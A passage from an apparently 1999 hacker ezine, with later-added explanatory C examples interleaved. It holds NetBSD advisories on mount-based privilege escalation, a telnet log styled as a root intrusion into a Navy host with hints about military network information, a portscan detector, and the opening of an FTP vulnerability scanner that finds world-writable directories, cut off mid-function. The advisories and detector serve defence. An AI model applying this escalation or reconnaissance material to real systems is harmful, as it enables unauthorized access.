amiga, arm32, atari, bebox, i386, mac68k, macppc, newsmips, next68k,
ofppc, pmax, sparc, sparc64, vax, x68k.

The alpha, hp300, mvme68k, pc532 and sun3 ports do not include umapfs
by default.

Technical Details
=================

umapfs creates a null layer, duplicating a sub-tree of the file system
name space under another part of the global file system, with uid/gid
remapping. The uid and gid mappings are described in two files supplied
by the user to mount_umap(8).

When a umapfs mount is attempted, no additional checks are done in the
kernel other than the usual checks: the user must be root, or have read
access of the target and be owner of the mount point. The only
permission checks made were erroneously placed in the mount_umap(8)
command. A malicious user can compile their own mount_umap binary that
does not include these checks. With this modified mount_umap a user
can mount any directory on another directory they have write access to
with their uid mapped to 0. They will then be able to create and
modify root owned files in the source directory, including the ability
to create setuid root binaries.


Solution and Workarounds
=========================

A patch is available for NetBSD 1.3.3 which restricts umapfs mounts
to root and fixes the above problem. You may find this patch on the
NetBSD ftp server:

ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/patches/19990311-umapfs

NetBSD-current since 19990312 is not vulnerable. Users of NetBSD-current
should upgrade to a source tree later than 19990312.

If neither of the above can be performed, a simple work around is to
remove umapfs from your kernel configuration and rebuild a kernel.
For this you need to remove or comment out the line:

file-system UMAPFS # NULLFS + uid and gid remapping

in the configuration file. See these URLs for documentation on building
a NetBSD kernel:

http://www.NetBSD.ORG/Documentation/kernel/index.html#downloading_kernel_source
http://www.NetBSD.ORG/Documentation/kernel/index.html#building_a_kernel

Thanks To
=========

Thanks go to Manuel Bouyer <bouyer@antioche.lip6.fr> for the discovery
and solution for this problem.


Revision History
================
1999/03/17 - initial version


More Information
================

Information about NetBSD and NetBSD security can be found at
http://www.NetBSD.ORG/ and http://www.NetBSD.ORG/Security/.


Copyright 1999, The NetBSD Foundation, Inc. All Rights Reserved.

$NetBSD: NetBSD-SA1999-006.txt,v 1.5 1999/03/17 12:15:13 mrg Exp $


@HWA


21.1 NetBSD noexec mount flag advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-----BEGIN PGP SIGNED MESSAGE-----

NetBSD Security Advisory 1999-007
=================================

Topic: noexec mount flag is not properly handled by non-root mount
Version: NetBSD 1.3.3 and prior; NetBSD-current until 19990318
Severity: Local users can execute binaries they're not allowed to


Abstract
========

On a system where all partitions writable by regular users are mounted with
the `noexec' option, a regular user should not be able to execute a binary
which was not put on the system by the administrator. Insufficient checks
in the mount system call may allow a regular user to mount a device,
remote host or local directory without the `noexec' option, allowing them
to execute arbitrary binaries.


Technical Details
=================

The mount syscall does not require root privileges, it only requires that
the user has read access to the target and is owner of the mount point.
For such mounts, the `nosuid' and `nodev' flags, which disable set-id
executables and device special files respectively, are automatically handled
by the mount system call, but not the `noexec' flag, which disables the
ability to execute binaries on this partition. This allows a regular
user to perform a mount on a mount point he owns, and then execute binaries
from this mount point, even if the mount point was initially in a sub-tree
of the global filesystem mounted with the `noexec' option. The easiest way
to bypass a `noexec' restriction is to use a nullfs mount, but a NFS mount,
or a mount from a readable block device can allow it as well.


Solutions and Workarounds
=========================

A patch is available for NetBSD 1.3.3 which makes the mount system call
inherit the `noexec' flag from the mount point. You may find this patch on
the NetBSD ftp server:

ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/patches/19990317-mount

NetBSD-current since 19990318 is not vulnerable. Users of NetBSD-current
should upgrade to a source tree later than 19990318.


Thanks To
=========

Manuel Bouyer <bouyer@antioche.lip6.fr> for the solution.


Revision History
================

1999/03/17 - initial version


More Information
================

Information about NetBSD and NetBSD security can be found at
http://www.NetBSD.ORG/ and http://www.NetBSD.ORG/Security/.


Copyright 1999, The NetBSD Foundation, Inc. All Rights Reserved.

$NetBSD: NetBSD-SA1999-007.txt,v 1.1 1999/03/18 07:35:55 mrg Exp $

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQCVAwUBNvCxMz5Ru2/4N2IFAQFWkAQAlHWahlMRPWuribmek9zc/incJeGi8OWj
TxxZY2OPMPluEkmOT30xsGtpNZWKaDUv8g1q6X3KBnYsZFonS5RW/AhClSha5nCL
Kx4GiG/9KNK07a06F0G+WjxOrAXSSvh0UyxLbn6E7VJa7/g8h2Uk3osG5SNMkuvj
qTfmCofhnKI=
=TH30
-----END PGP SIGNATURE-----
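Both advisories turn on the same design point: a permission check on a non-root mount only counts if the kernel makes it (SA1999-006 moved the umapfs check out of mount_umap(8), which any user can rebuild without it), and flags a user must not be able to lift (nosuid, nodev, and after SA1999-007 also noexec) have to be applied by the kernel rather than trusted from the caller. The following C is an added example, not NetBSD code: it models the mount-policy decision before and after the two patches. The flag bit values, the fs type names and the uid 1000 are assumptions of this model and are not NetBSD's real constants.

```c
#include <stdbool.h>
#include <stdio.h>
#include <sys/types.h>

/* Illustrative flag bits and fs types for this model only; NetBSD's real
 * constants live in <sys/mount.h> and are not these values. */
#define F_NOSUID 0x1
#define F_NODEV  0x2
#define F_NOEXEC 0x4

enum fstype { FS_FFS, FS_NFS, FS_NULLFS, FS_UMAPFS };

struct mount_req {
    uid_t       caller;          /* uid of the process calling mount(2)        */
    bool        owns_mountpoint; /* caller owns the mount point                */
    bool        can_read_target; /* caller has read access to the source       */
    enum fstype type;
    unsigned    flags;           /* flags the caller asked for                 */
    unsigned    parent_flags;    /* flags of the mount holding the mount point */
};

/* Kernel-side mount policy. 'patched' selects behaviour before or after the
 * two advisories. Returns 0 and stores the effective flags, or -1 (EPERM). */
int mount_policy(const struct mount_req *m, bool patched, unsigned *effective)
{
    unsigned flags = m->flags;

    if (m->caller != 0) {
        /* The checks both advisories describe as already present. */
        if (!m->owns_mountpoint || !m->can_read_target)
            return -1;

        /* SA1999-006: the only check on uid/gid remapping lived in
         * mount_umap(8), which a user can rebuild without it. The fix
         * refuses umapfs to non-root here, where it cannot be skipped. */
        if (patched && m->type == FS_UMAPFS)
            return -1;

        /* nosuid and nodev were already forced on non-root mounts ... */
        flags |= F_NOSUID | F_NODEV;

        /* SA1999-007: ... but noexec was not, so a nullfs/NFS/device mount
         * on a mount point inside a noexec tree gave an executable view of
         * the same files. The fix inherits noexec from the mount point. */
        if (patched)
            flags |= m->parent_flags & F_NOEXEC;
    }
    *effective = flags;
    return 0;
}

/* Scenario: unprivileged user mounts nullfs on a mount point under a noexec
 * tree. Returns 1 if the resulting mount allows execution. */
int user_can_exec_under_noexec(bool patched)
{
    struct mount_req m = { .caller = 1000, .owns_mountpoint = true,
                           .can_read_target = true, .type = FS_NULLFS,
                           .flags = 0, .parent_flags = F_NOEXEC };
    unsigned eff;
    if (mount_policy(&m, patched, &eff) != 0)
        return 0;
    return (eff & F_NOEXEC) == 0;
}

/* Scenario: unprivileged user asks for a umapfs mount at all. */
int user_can_mount_umapfs(bool patched)
{
    struct mount_req m = { .caller = 1000, .owns_mountpoint = true,
                           .can_read_target = true, .type = FS_UMAPFS };
    unsigned eff;
    return mount_policy(&m, patched, &eff) == 0;
}

int root_can_mount_umapfs(bool patched)
{
    struct mount_req m = { .caller = 0, .type = FS_UMAPFS };
    unsigned eff;
    return mount_policy(&m, patched, &eff) == 0;
}

int main(void)
{
    printf("unpatched: user exec under noexec=%d, user umapfs=%d\n",
           user_can_exec_under_noexec(false), user_can_mount_umapfs(false));
    printf("patched:   user exec under noexec=%d, user umapfs=%d, root umapfs=%d\n",
           user_can_exec_under_noexec(true), user_can_mount_umapfs(true),
           root_can_mount_umapfs(true));
    return 0;
}
```

Build with a C99 compiler (cc -std=c99); main() prints the outcome of each scenario in both states. The point to take from the model is where the checks sit: the owner/readability test, the umapfs refusal and the flag forcing all happen after the system call boundary, so no rebuilt userland tool can route around them.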


@HWA

22.0 Checkpoint releases new DHCP based user 'mapping' technology to track users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From the ISN list

Forwarded From: Will Spencer <will.spencer@gte.net>


Check Point Launches Address Mapping Technology


Check Point Software Technologies Ltd. introduced mapping technology
yesterday that automatically matches an end user's identity to a
dynamically assigned IP address.


Check Point says its User to Address Mapping technology will help IT
managers track network use and enforce access policies in Dynamic Host
Configuration Protocol (DHCP) environments, where IP addresses change often.
A byproduct of Check Point's 1998 merger with MetaInfo, the technology is
available as part of Check Point's Meta IP software for IP address management.


User to Address Mapping is also integrated with Check Point's FireWall-1
and VPN-1 products. When IT managers use this technology in conjunction
with their firewalls, they can control access: assign granular network
privileges, track excessive Internet usage, and trace unauthorized IP
addresses that cause conflicts that interrupt network service.


User to Address Mapping transparently maps four components -- a user's
logon name, logon time, IP address, and Media Access Control address -- to
a dynamically assigned IP address. An Enterprise Edition of the Meta IP
4.1 product starts at $9,995 for a 1,000-node network. A version for
smaller networks starts at $445 for a 100-node license. -- Amy K. Larsen


-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]


@HWA

23.0 SPAWAR a Navy Infosec site ... go FISH
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Web Site:

US DEPARTMENT OF DEFENSE WARNING STATEMENT

This is a Department of Defense computer system. This computer system, including all related equipment, networks and
network devices (specifically including Internet access), are provided only for authorized U. S. Government use. DoD
computer systems may be monitored for all lawful purposes, including to ensure that their use is authorized, for
management of the system, to facilitate protection against unauthorized access, and to verify security procedures,
survivability and operational security. Monitoring includes active attacks by authorized DoD entities to test or verify the
security of this system. During monitoring, information may be examined, recorded, copied and used for authorized
purposes. All information, including personal information, placed on or sent over this system may be monitored. Use of this
DoD computer system, authorized or unauthorized, constitutes consent to monitoring of this system. Unauthorized use
may subject you to criminal prosecution. Evidence of unauthorized use collected during monitoring may be used for
administrative, criminal or adverse action. Use of this system constitutes consent to monitoring for these purposes.


PRIVACY AND SECURITY NOTICE

This Navy Web Information Service is provided as an official service by the Space and Naval Warfare Systems Command.
For site security and management purposes, all transactions with this server are collected for security and statistical
purposes. This government computer system uses software programs to create summary statistics, which are used for
determining technical design specifications, traffic load, and to identify system performance or problem areas. For site
security purposes and to ensure that this service remains available to all users, this government computer system employs
software programs to monitor network traffic to identify unauthorized attempts to upload or change information, or otherwise
cause damage. Except for authorized law enforcement investigations, no other attempts are made to identify individual
users or their usage habits. Raw data logs are used for no other purposes and are scheduled for regular destruction in
accordance with National Archives and Records Administration General Schedule 20. Unauthorized attempts to upload
information or change information on this service are strictly prohibited and may be punishable under the Computer Fraud
and Abuse Act of 1986 and the National Information Infrastructure Protection Act. If you have any questions or comments
about the information presented here, please forward them to the Internet Operations Manager or 1.800.304.4636.


DISCLAIMER

Areas of this Server link to other Web Information Systems providing security-related information which are operated by
other government organizations, commercial firms, educational institutions, and private parties. We have no control over the
Information on those systems which may be objectionable or which may not otherwise conform to Department of Navy
policies. Unless otherwise noted, some of the Sites listed within the pages of this server are provided by organizations
outside the Navy Domain. These links are offered as a convenience and for informational purposes only. Their inclusion here
does not constitute an endorsement or an approval by the Department of the Navy of any of the products, services, or
opinions of the external providers. The Department of the Navy bears no responsibility for the accuracy or the content of
external sites.


Telnet: (real system, simulated intrusion)

$telnet x.x.x.x

Trying x.x.x.x...
Connected to x.x.x.
Escape character is '^]'.

UNIX(r) System V Release 4.0 (droid)

----------------------------------------------------------------------------
| USE OF THIS OR ANY OTHER DEPT. OF DEFENSE INTEREST COMPUTER SYSTEM |
| (DODICS) CONSTITUTES AN EXPRESS CONSENT TO MONITORING AT ALL TIMES. |
| This DODICS and all related equipment are to be used for the communication,|
| transmission, processing, and storage of official U.S. Government or other |
| authorized information only. All DODICS are subject to monitoring at all |
| times. If monitoring of any DODICS reveals possible violation of criminal |
| statutes, all relevant information may be provided to law enforcement |
| officials. |
----------------------------------------------------------------------------


login: root
Password:
login incorrect
login: root
Password:
Last login: Wed Mar 31 15:50:07 from hactivism.net
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.

(droid) #1: Thu Dec 24 17:14:45 EST 1998
Updated with: ISS 2.03 October 1998
BEWARE.
stty: No match.
% ps -aux
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
sas 549 95.5 1.3 1156 836 p0- R Thu04PM 8644:39.03 /usr/local/bin/
sas 13683 2.4 0.5 468 336 p0 Ss 8:15PM 0:00.59 -csh (csh)
root 13682 1.2 1.0 844 596 ?? Ss 8:15PM 0:00.35 telnetd
root 3 0.0 0.0 0 0 ?? DL Thu09AM 0:00.00 (vmdaemon)
root 4 0.0 0.0 0 0 ?? DL Thu09AM 13:06.06 (syncer)
root 29 0.0 0.2 204 88 ?? Is Thu09AM 0:00.01 adjkerntz -i
root 89 0.0 0.8 788 496 ?? Ss Thu02PM 0:41.67 syslogd
daemon 101 0.0 0.7 760 464 ?? Is Thu02PM 0:00.33 portmap
root 125 0.0 0.8 820 500 ?? Ss Thu02PM 0:20.93 inetd
root 128 0.0 0.8 936 492 ?? Ss Thu02PM 0:43.73 cron
root 178 0.0 1.2 1156 768 ?? Ss Thu02PM 0:08.37 sendmail: accep
root 315 0.0 1.7 1276 1044 v0 Is+ Thu02PM 0:07.11 -tcsh (tcsh)
root 317 0.0 0.8 780 476 v2 Is+ Thu02PM 0:00.14 /usr/libexec/ge
root 318 0.0 0.8 780 476 v3 Is+ Thu02PM 0:00.13 /usr/libexec/ge
root 319 0.0 0.7 776 420 ?? I Thu02PM 0:00.11 /usr/libexec/ge
root 320 0.0 0.7 776 420 ?? I Thu02PM 0:00.11 /usr/libexec/ge
root 371 0.0 1.2 1036 744 ?? Is Thu02PM 0:55.74 SCREEN (screen-
root 1959 0.0 1.6 1400 972 ?? Ss Fri10AM 3:13.06 httpd
root 1965 0.0 1.3 1072 824 ?? Ss Fri10AM 1:41.84 /usr/local/etc/
root 1966 0.0 1.2 1004 732 ?? IN Fri10AM 0:01.79 /usr/local/etc/
root 12504 0.0 0.8 780 516 v1 Is+ 11:45PM 0:00.14 /usr/libexec/ge
nobody 13143 0.0 1.9 1456 1188 ?? I 9:43AM 0:00.97 httpd
nobody 13153 0.0 1.9 1456 1204 ?? I 9:55AM 0:00.82 httpd
nobody 13228 0.0 1.9 1468 1212 ?? I 11:38AM 0:00.66 httpd
nobody 13529 0.0 1.9 1456 1204 ?? I 4:57PM 0:00.23 httpd
root 13576 0.0 1.3 1072 784 ?? I 5:54PM 0:00.02 /usr/local/etc/
root 13645 0.0 1.3 1072 832 ?? I 7:25PM 0:00.02 /usr/local/etc/
root 0 0.0 0.0 0 0 ?? DLs Thu09AM 0:04.13 (swapper)
root 1 0.0 0.4 416 248 ?? Is Thu09AM 0:02.43 /sbin/init --
root 2 0.0 0.0 0 0 ?? DL Thu09AM 0:09.21 (pagedaemon)
% ls -laF /ftp
total 6
drwxr-xr-x 6 root wheel 512 Mar 11 14:15 ./
drwxr-xr-x 14 root wheel 1024 Jan 26 12:28 ../
drwxr-xr-x 2 root wheel 512 Mar 1 15:57 pub/
drwxr-xr-x 3 root wheel 512 Mar 12 12:04 pvt/
drwxrwxrwx 35 root wheel 1024 Mar 31 06:54 secure/
drwxrwxrwx 2 root wheel 512 Mar 11 14:15 warez/
% cd /www
%
logout
Connection closed by foreign host.
$

By the way, a site that is good to look around with lots of legit info is www.nic.mil and
ftp.nic.mil .... network topology to phone numbers for NIPR/SIPRNET can be found on that
system.

Anyway the point of all this is that on this navy site it's a good idea to {ahem} go FISH,
yeah, that's right, http://infosec.nosc.mil/FISH/ has a lot of good information. btw, FISH stands
for Fleet Internet Security Handbook. Cute huh? heh.



@HWA

24.0 Portscan detector
~~~~~~~~~~~~~~~~~

/*
* Scandetd is a daemon which tries to recognize port scanning.
* If it happens the daemon sends e-mail to a specified address (by default
* root@localhost)
* with the following information:
*
* time
* host
* how many connections were made
* port of first connection and port of last connection
*
* compile: gcc scandetd.c -o scandetd
*
* author: Michal Suszycki mike@wizard.ae.krakow.pl
*
* You can change few define's and variables below this comment to tune
* scandetd to your needs.
*
* If you have some problems with compiling try to
* change 2 lines:
* #include <netinet/ip.h> to #include <linux/ip.h>
* #include <netinet/tcp.h> to #include <linux/tcp.h>
*
* This code was based on IpLogger Package by Mike Edulla (medulla@infosoc.com)
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 1, or (at your option)
* any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*/


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <syslog.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
//#include <netinet/ip.h>
#include <linux/ip.h>
//#include <netinet/tcp.h>
#include <linux/tcp.h>
#include <time.h>
#include <signal.h>
#include <string.h>

#include <errno.h> /* errno is declared here; never declare it by hand */


/* how many hosts should I remember. If your server is heavily loaded it's
good idea to increase this number a little bit
*/

#define HOW_MANY 6

/* how many connections should I recognize as scanning? */
#define SCAN 25


/* uncomment this if you want to ignore 'scanning' which starts and ends on
port 80. It happens that some host makes a lot
of fast connections only on port 80. Of course we don't want to log it.
*/

#define NOWWW


/*
If next connection arrived right after the previous one we have to count it.
Default time is 1 second.
*/

#define SEC 1

/* We use this port for sending mail */
#define MAIL_PORT 25

/* we send mail to <user@host>: */
char *mail_to = "<root@localhost>";

/* IP of the machine which sends our mail */
char *mail_host = "127.0.0.1";

/* mail will be send from host: */
char *from_host = "localhost";


/* ----------- end of user's configuration ---------------- */

#ifndef NOFILE
#define NOFILE 1024
#endif


char *hostlookup(int i)
{
static char buff[128];
struct in_addr p;
p.s_addr = i;
strncpy(buff,inet_ntoa(p),sizeof buff);
return buff;
}

char *servlookup(unsigned short port)
{
struct servent *se;
static char buff[1024];

se=getservbyport(port, "tcp");
if(se == NULL) sprintf(buff, "port %d", ntohs(port));
else sprintf(buff, "%s", se->s_name);
return buff;
}


struct ippkt{
struct iphdr ip;
struct tcphdr tcp;
} pkt;

struct host{
unsigned int from;
time_t t;
unsigned short low_port;
unsigned short hi_port;
int count;
} hosts[HOW_MANY];

void demonize()
{
int fd, f;

/* Only detach if we weren't started by init (ppid 1) already. */
if (getppid() != 1){
signal(SIGTTOU,SIG_IGN);
signal(SIGTTIN,SIG_IGN);
signal(SIGTSTP,SIG_IGN);
f = fork();
if (f < 0)
exit(-1);

if (f > 0)
exit (0);

/* child process: new session, no controlling terminal, no inherited fds */
setsid();
for (fd = 0 ; fd < NOFILE; fd++) close(fd);
chdir("/");
umask(0);
return;
}
}


void init()
{
int i;
time_t now;
now = time(NULL);
for (i = 0; i < HOW_MANY; i++)
hosts[i].t = now;
}

int allocate(int *p, unsigned int addr)
{
int i, v = 0;
time_t tmp = hosts[0].t;
for( i = 0; i < HOW_MANY; i++){
if (hosts[i].t <= tmp) {
tmp = hosts[i].t;
v = i;
}
if (hosts[i].from == addr){
*p = 1;
return i;
}
}
*p = 0;
return v;
}

void show(int a)
{
int i;

for (i = 0; i < HOW_MANY; i++){
printf("Host %s, time %ld, count=%d, l=%d,",
hostlookup(hosts[i].from),hosts[i].t, hosts[i].count,
ntohs(hosts[i].low_port));
printf("hi = %d\n",ntohs(hosts[i].hi_port));
}
exit (0);
}

void no_zombie(int i)
{
wait(NULL);
}

int send_mail(struct host *bad)
{
static struct sockaddr_in sa;
int s, i, low, high;
char buf[1024], combuf[256];

char *comm[] = { "HELO ", from_host,
"MAIL FROM: SCANDETD@", from_host,
"RCPT TO:" , mail_to,
"DATA" , " "
};

/* Fork so the SMTP exchange (with its sleeps) doesn't stall sniffing: */
/* the parent returns to the capture loop at once, the child delivers */
/* the mail and exits, and the SIGCHLD handler set in main() reaps it. */
i = fork();
if (i > 0) return 0;
if (i < 0) return -1;

low = ntohs(bad->low_port);
high = ntohs(bad->hi_port);
snprintf(buf, sizeof(buf), "%sPossible port scanning from %s,\n"
"I counted %d connections.\nFirst connection was made on %d port and the last one on %d port.\r\n.\r\n",
ctime(&bad->t),hostlookup(bad->from),bad->count, low, high);


sa.sin_port = htons(MAIL_PORT);
sa.sin_family = AF_INET;
if ((sa.sin_addr.s_addr = inet_addr(mail_host)) == INADDR_NONE)
exit (-1);

memset(&sa.sin_zero, 0, sizeof(sa.sin_zero));
if ((s = socket(AF_INET,SOCK_STREAM,0)) < 0)
exit (-1);

if (connect(s,(struct sockaddr *) &sa, sizeof (struct sockaddr)) < 0)
exit (-1);

/* SMTP lines end in CRLF; most MTAs tolerate bare LF but it is not required to. */
for (i = 0; i < 8 ; i += 2){
snprintf(combuf, sizeof(combuf), "%s%s\r\n",comm[i],comm[i+1]);
if (write(s,combuf,strlen(combuf)) < 0 ){
close(s);
exit(-1);
}
sleep(1);
}
if (write(s,buf,strlen(buf)) < 0) exit(-1);
sleep(1);
if (write(s,"QUIT\r\n",6) < 0) exit (-1);

close(s);
exit(0);
}


int main(int argc, char **argv)
{
int s, index, was;
time_t now;

demonize();

init();
/* Raw TCP socket (needs root). Every read() returns one packet starting */
/* with the IP header; like the original this assumes no IP options. */
s = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
if (s < 0)
exit(-1);
// openlog("scand", 0, LOG_LOCAL2);
// syslog(LOG_NOTICE,"scand started and ready");
// signal(SIGINT,show);

/* to avoid zombies */
signal(SIGCHLD,no_zombie);

while(1){
if (read(s, &pkt, sizeof(pkt)) < (ssize_t) sizeof(pkt))
continue; /* error (e.g. EINTR) or short read: not a full IP+TCP header */
now = time(NULL);

/* only pure SYNs count, i.e. new connection attempts */
if (pkt.tcp.syn == 1 && pkt.tcp.ack == 0){

index = allocate(&was,pkt.ip.saddr);

if (!was){
/* This slot is being recycled for a new host, so this is where the */
/* previous occupant is judged: a scan is only reported once its slot */
/* is reused, never while it is in progress. */
if (hosts[index].count >= SCAN
#ifdef NOWWW
/* the original used the literal 20480, which equals htons(80) only on */
/* little-endian machines; htons(80) is correct everywhere */
&& hosts[index].low_port != htons(80)
&& hosts[index].hi_port != htons(80)
#endif
)
send_mail(&hosts[index]);

hosts[index].from = pkt.ip.saddr;
hosts[index].low_port = pkt.tcp.dest;
hosts[index].hi_port = pkt.tcp.dest;
hosts[index].count = 1;
hosts[index].t = now;
continue;
}

/* if this connection was right after previous we must count it */
else if (now - SEC <= hosts[index].t){
hosts[index].count++;
hosts[index].hi_port = pkt.tcp.dest;

}
hosts[index].t = now;
}
}
return 0;
}
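scandetd's heuristic (count back-to-back SYNs from one source, alert at SCAN of them, exempt port-80 bursts) has two quirks visible in the code above: a scan is only reported when its slot is recycled for another host, and the web exemption is a single hard-coded port. The following C is an added example, separate from scandetd and fed constructed SYN records instead of a raw socket: it implements the same idea with those two points changed, alerting the moment a burst crosses the threshold and exempting any burst that touches only one port, of which the port-80 case is one instance. The thresholds, slot count and sample addresses are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <time.h>

#define MAX_SOURCES    16   /* per-source slots (scandetd's HOW_MANY) */
#define SCAN_THRESHOLD 25   /* SYNs in one burst before we alert (SCAN) */
#define MAX_GAP        1    /* seconds allowed between consecutive SYNs (SEC) */

struct syn_rec { const char *src; unsigned short dport; time_t t; };

struct src_state {
    char src[16];
    time_t last;            /* time of the previous SYN from this source */
    int count;              /* SYNs in the current burst */
    unsigned short lo, hi;  /* lowest and highest destination port seen in it */
    int alerted;            /* burst already reported */
};

struct detector { struct src_state s[MAX_SOURCES]; };

/* Return the slot tracking src, recycling the least recently active one. */
static struct src_state *slot_for(struct detector *d, const char *src)
{
    int i, oldest = 0;

    for (i = 0; i < MAX_SOURCES; i++) {
        if (strcmp(d->s[i].src, src) == 0)
            return &d->s[i];
        if (d->s[i].last < d->s[oldest].last)
            oldest = i;
    }
    memset(&d->s[oldest], 0, sizeof d->s[oldest]);
    snprintf(d->s[oldest].src, sizeof d->s[oldest].src, "%s", src);
    return &d->s[oldest];
}

/* Feed one SYN. Returns 1 exactly once per burst, when the burst reaches the
 * threshold having touched more than one port; a burst that hammers a single
 * port (a busy web client, for instance) never qualifies. */
int feed_syn(struct detector *d, const struct syn_rec *r)
{
    struct src_state *s = slot_for(d, r->src);

    if (s->count == 0 || r->t - s->last > MAX_GAP) {   /* gap too long: new burst */
        s->count = 1;
        s->lo = s->hi = r->dport;
        s->alerted = 0;
    } else {
        s->count++;
        if (r->dport < s->lo) s->lo = r->dport;
        if (r->dport > s->hi) s->hi = r->dport;
    }
    s->last = r->t;

    if (!s->alerted && s->count >= SCAN_THRESHOLD && s->lo != s->hi) {
        s->alerted = 1;
        return 1;
    }
    return 0;
}

static char g_alerted_src[16];

static int note(int hit, const char *src)
{
    if (hit && g_alerted_src[0] == '\0')
        snprintf(g_alerted_src, sizeof g_alerted_src, "%s", src);
    return hit;
}

/* Run constructed sample traffic (not captured data) through a fresh
 * detector and return the number of alerts raised. */
int sample_alert_count(void)
{
    struct detector d;
    struct syn_rec r;
    int i, alerts = 0;

    memset(&d, 0, sizeof d);
    g_alerted_src[0] = '\0';

    for (i = 0; i < 30; i++) {   /* 10.0.0.5: ports 21..50, ten per second: a scan */
        r.src = "10.0.0.5"; r.dport = (unsigned short)(21 + i); r.t = 1000 + i / 10;
        alerts += note(feed_syn(&d, &r), r.src);
    }
    for (i = 0; i < 30; i++) {   /* 10.0.0.9: port 80 only, same pace: not a scan */
        r.src = "10.0.0.9"; r.dport = 80; r.t = 1000 + i / 10;
        alerts += note(feed_syn(&d, &r), r.src);
    }
    for (i = 0; i < 30; i++) {   /* 10.0.0.7: one port every 5 s: gaps reset the burst */
        r.src = "10.0.0.7"; r.dport = (unsigned short)(21 + i); r.t = 1000 + 5 * i;
        alerts += note(feed_syn(&d, &r), r.src);
    }
    return alerts;
}

/* Source of the first alert raised by sample_alert_count(), or "". */
const char *sample_alerted_source(void)
{
    sample_alert_count();
    return g_alerted_src;
}

int main(void)
{
    int n = sample_alert_count();
    printf("%d alert(s); first from %s\n", n, sample_alerted_source());
    return 0;
}
```

In a real deployment feed_syn() would be called from the packet loop with the source address and destination port pulled from the headers, exactly where scandetd tests pkt.tcp.syn and pkt.tcp.ack. Note the slow probe from 10.0.0.7 is not caught: a per-source gap rule is easy to evade by pacing, which is why a second, longer-window counter of distinct ports is usually kept alongside it.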


@HWA


25.0 FTP Vulnerability scanner
~~~~~~~~~~~~~~~~~~~~~~~~~


Here is a ftp vulnerability scanner:
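The scanner below decides whether anonymous login worked by searching the reply for the word "denied", and leaves it to the reader to eyeball the LIST -lR output for world-writable directories. As an added example that is not part of ftpscan, the following C does both steps properly: it extracts the numeric reply code from single- and multi-line FTP replies as RFC 959 defines them, and walks a recursive listing to pick out directories whose mode string grants write to everyone. The listing embedded in it is constructed for the example, not captured from any host.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Return the three-digit code of a complete FTP reply, or -1 if the buffer
 * does not yet hold a complete reply. A multi-line reply starts with "ddd-"
 * and ends at a line that starts with the same "ddd" followed by a space. */
int ftp_reply_code(const char *reply)
{
    const char *line;
    int code;

    if (strlen(reply) < 4 || !isdigit((unsigned char)reply[0]) ||
        !isdigit((unsigned char)reply[1]) || !isdigit((unsigned char)reply[2]))
        return -1;
    code = (reply[0] - '0') * 100 + (reply[1] - '0') * 10 + (reply[2] - '0');
    if (reply[3] == ' ')
        return code;                          /* single-line reply */
    if (reply[3] != '-')
        return -1;
    for (line = reply; (line = strchr(line, '\n')) != NULL; ) {
        line++;                               /* start of the next line */
        if (strncmp(line, reply, 3) == 0 && line[3] == ' ')
            return code;                      /* terminating line found */
    }
    return -1;
}

/* Walk an "ls -lR"-style listing, the usual output of LIST -lR on a Unix
 * ftpd. Lines ending in ':' name the directory that follows ("./pub:");
 * entry lines carry a mode string whose 9th character is the other-write
 * bit. Paths of world-writable directories are copied into out; the count
 * found is returned. */
int find_world_writable_dirs(const char *listing, char out[][128], int max)
{
    char cur[128] = "";
    char line[256];
    const char *p = listing, *nl, *name, *d;
    size_t len;
    int found = 0;

    while (*p) {
        nl = strchr(p, '\n');
        len = nl ? (size_t)(nl - p) : strlen(p);
        if (len >= sizeof line)
            len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        if (len && line[len - 1] == '\r')
            line[--len] = '\0';

        if (len && line[len - 1] == ':') {              /* directory header */
            line[len - 1] = '\0';
            d = line;
            if (strcmp(d, ".") == 0)
                d = "";
            else if (strncmp(d, "./", 2) == 0)
                d += 2;
            snprintf(cur, sizeof cur, "%s", d);
        } else if (len > 10 && line[0] == 'd' && line[8] == 'w' &&
                   (name = strrchr(line, ' ')) != NULL) {
            name++;                                     /* last field: the name */
            if (strcmp(name, ".") && strcmp(name, "..") && found < max)
                snprintf(out[found++], 128, "%s%s%s",
                         cur, cur[0] ? "/" : "", name);
        }
        p = nl ? nl + 1 : p + strlen(p);
    }
    return found;
}

/* Constructed sample listing (not captured from any host). */
static const char sample_listing[] =
    ".:\r\n"
    "total 6\r\n"
    "drwxr-xr-x   2 root  wheel   512 Mar  1 15:57 pub\r\n"
    "drwxrwxrwx   2 root  wheel   512 Mar 11 14:15 incoming\r\n"
    "-rw-rw-rw-   1 root  wheel  1024 Mar 11 14:15 README\r\n"
    "\r\n"
    "./pub:\r\n"
    "total 2\r\n"
    "drwxrwxrwx   3 ftp   ftp     512 Mar 12 12:04 uploads\r\n"
    "drwxr-xr-x   2 root  wheel   512 Mar 12 12:04 mirrors\r\n";

static char found_dirs[8][128];

int sample_world_writable_count(void)
{
    return find_world_writable_dirs(sample_listing, found_dirs, 8);
}

const char *sample_world_writable_dir(int i)
{
    int n = sample_world_writable_count();
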